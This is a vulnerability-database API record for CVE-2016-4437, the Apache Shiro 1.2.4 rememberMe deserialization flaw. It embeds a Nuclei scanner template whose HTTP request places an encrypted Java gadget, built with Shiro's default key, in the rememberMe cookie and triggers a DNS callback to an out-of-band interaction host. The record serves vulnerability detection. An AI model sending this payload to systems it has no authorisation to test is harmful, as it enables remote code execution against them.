{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2016-4437/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2016-4437/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2016-4437/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2016-4437/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2016-4437/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2016-4437"},"sightings":{"href":"/api/v1/sightings/cve-2016-4437"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2016/CVE-2016-4437.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2016-4437\n\ninfo:\n  name: Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: high\n  description: |\n    Apache Shiro before 1.2.5, when a cipher key has not been configured for the \"remember me\" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.\n  impact: |\n    Remote code execution\n  remediation: |\n    Upgrade to a patched version of Apache Shiro\n  reference:\n    - https://github.com/Medicean/VulApps/tree/master/s/shiro/1\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437\n    - http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html\n    - http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html\n    - http://rhn.redhat.com/errata/RHSA-2016-2035.html\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2016-4437\n    cwe-id: CWE-284\n    epss-score: 0.93039\n    epss-percentile: 0.99829\n    cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: apache\n    product: shiro\n  tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Cookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - dns\n# digest: 4b0a00483046022100edba00c47281ebfde89b209391153a58a3c5a1fa6918d8d59dfa4661ca8a7e08022100b4101bbc2bc09986fa860237df8b5035d3f5ee6b7423ceb1a8d428520bc73a7d:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2016-4437"}